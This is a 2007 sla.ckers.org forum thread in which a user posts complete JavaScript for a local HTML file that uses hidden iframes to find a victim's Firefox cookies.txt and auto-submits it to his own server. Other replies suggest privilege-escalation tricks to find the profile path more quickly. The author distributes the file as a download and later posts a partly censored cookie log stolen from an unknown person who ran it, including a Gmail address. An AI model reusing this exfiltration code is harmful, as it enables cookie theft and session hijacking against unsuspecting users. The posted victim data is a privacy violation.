Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
My web page from hell
Posted by: bsoric
Date: August 09, 2007 11:10PM

After reading http://www.gnucitizen.org/blog/web-pages-from-hell I wrote an HTML file with Javascript to find the local user's Firefox cookies.txt file and upload it to my website.

The file is here: http://www.bsoric.com/Files/thief.zip (It's zipped to force the user to download and run it from file:///)

I've tested it on friends' computers with XP and Vista and had it work. I also tested it on my Debian Etch machine, but it wouldn't work, so I removed the file path for Linux systems.

As I'm not great with Javascript, I used 3 iframes and a form to find the file and upload the contents. Does anyone know of a more efficient way to do this?

Options: ReplyQuote
Re: My web page from hell
Posted by: bsoric
Date: August 10, 2007 03:43AM

It just occurred to me that people may be a tiny bit hesitant to download and open a webpage which is designed to send away their cookies. So, here's the source:

<html><head>
<title></title>
</head><body>
<script>

function findOS(st) {
var OSes = new Array("file:///C:/Users/","file:///C:/Documents%20and%20Settings/");
try {
document.all.a.src=OSes[st];
findusers(document.all.a,st);
} catch (e) {
findOS(st + 1);
}
}

function findusers(iframe,OS) {
iframe.onload = function() {
var OSappdatas = new Array("/AppData/Roaming/Mozilla/Firefox/Profiles/","/Application%20Data/Mozilla/Firefox/Profiles/");
var content = '';
var username = '';
if (iframe.contentDocument) {
content = iframe.contentDocument.body.innerHTML;
} else if (iframe.contentWindow) {
content = iframe.contentWindow.document.body.innerHTML;
} else if (iframe.document) {
content = iframe.document.body.innerHTML;
}
var users=content.split("a href=\"");
for (var st=2; st<users.length; st++) {
username = users[st].split("\"")[0];
try {
document.all.b.src=iframe.src + username + OSappdatas[OS];
firefox(document.all.b,2);
} catch (e) {
;
}
}
}
}

function firefox(iframe,st) {
iframe.onload = function() {
var content = '';
var prof = '';
if (iframe.contentDocument) {
content = iframe.contentDocument.body.innerHTML;
} else if (iframe.contentWindow) {
content = iframe.contentWindow.document.body.innerHTML;
} else if (iframe.document) {
content = iframe.document.body.innerHTML;
}
var profiles=content.split("a href=\"");
prof = profiles[st].split("\"")[0];
try {
document.all.c.src = iframe.src + prof + "/cookies.txt";
download(document.all.c);
} catch (e) {
firefox(iframe,st + 1);
}
}
}

function download(iframe) {
iframe.onload = function() {
var content = '';
var prof = '';
if (iframe.contentDocument) {
content = iframe.contentDocument.body.innerHTML;
} else if (iframe.contentWindow) {
content = iframe.contentWindow.document.body.innerHTML;
} else if (iframe.document) {
content = iframe.document.body.innerHTML;
}
document.all.f.data.value=content;
document.all.f.s.click();
}
}
</script>
<div style="visibility:hidden">
<iframe id=c src=""></iframe>
<iframe id=b src=""></iframe>
<iframe id=a src=""></iframe>
<form id="f" action="http://www.bsoric.com/abc.php" method="post"><textarea name="data"></textarea><input type="submit" name="s" /></form>
<script>findOS(0);</script>
</div>
</body></html>

Options: ReplyQuote
Re: My web page from hell
Posted by: Anonymous User
Date: August 10, 2007 03:50AM

You could use the directory service in Firefox to find the profile folder:

const DIR_SERVICE = new Components.Constructor("@mozilla.org/file/directory_service;1","nsIProperties");
var path = (new DIR_SERVICE()).get("ProfD", Components.interfaces.nsIFile).path;

Or isn't that what you want? Sorry I had not the time to read all the new stuff.

Options: ReplyQuote
Re: My web page from hell
Posted by: bsoric
Date: August 10, 2007 04:10AM

The error console is giving me "Permission denied to get property UnnamedClass.Constructor" when I try to run that code.

But that is what I want, yes.

Options: ReplyQuote
Re: My web page from hell
Posted by: Anonymous User
Date: August 10, 2007 04:34AM

Yes, you have to get permission first:

netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");

But that only works locally, But I guess you figured that out.

Options: ReplyQuote
Re: My web page from hell
Posted by: bsoric
Date: August 10, 2007 05:20AM

Ah, I see. It works (and quicker than my way), but it first shows a "This script is UNSAFE!!!" dialog and makes me wait a few seconds before I can allow it.

Options: ReplyQuote
Re: My web page from hell
Posted by: Anonymous User
Date: August 10, 2007 06:04AM

Yes, that is correct. But mostly people will click yes if it runs locally since it's "trusted".

To quote Bruce Schneier: People will favor dancing bears over security. ^^

Options: ReplyQuote
Re: My web page from hell
Posted by: bsoric
Date: August 13, 2007 08:12PM

I just got up, but 3 hours ago someone ran my file from an IP I don't recognise. Being the responsible and totally non-evil person that I am, I'm deleting their cookies from my logs.

IP: 209.26.20.xx | Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 | DATE: Tuesday 14th 2007f August 2007 07:21:16 AM

<pre># HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

.ehg-techtarget.hitbox.com TRUE / FALSE *CENSORED*
.hitbox.com TRUE / FALSE *CENSORED*
.hitbox.com TRUE / FALSE *CENSORED*
ajaxian.com FALSE / FALSE *CENSORED*
.ehg-techtarget.hitbox.com TRUE / FALSE *CENSORED*
.ehg-techtarget.hitbox.com TRUE / FALSE *CENSORED*
.jobs.ajaxian.com TRUE / FALSE *CENSORED* jt_session_id *CENSORED*
.doubleclick.net TRUE / FALSE *CENSORED* id *CENSORED*
mail.google.com FALSE /mail FALSE *CENSORED* gmailchat simplisticnick@gmail.com/*CENSORED*

There's something I never knew- gmail stores your email address in the cookie.

Options: ReplyQuote


Sorry, only registered users may post in this forum.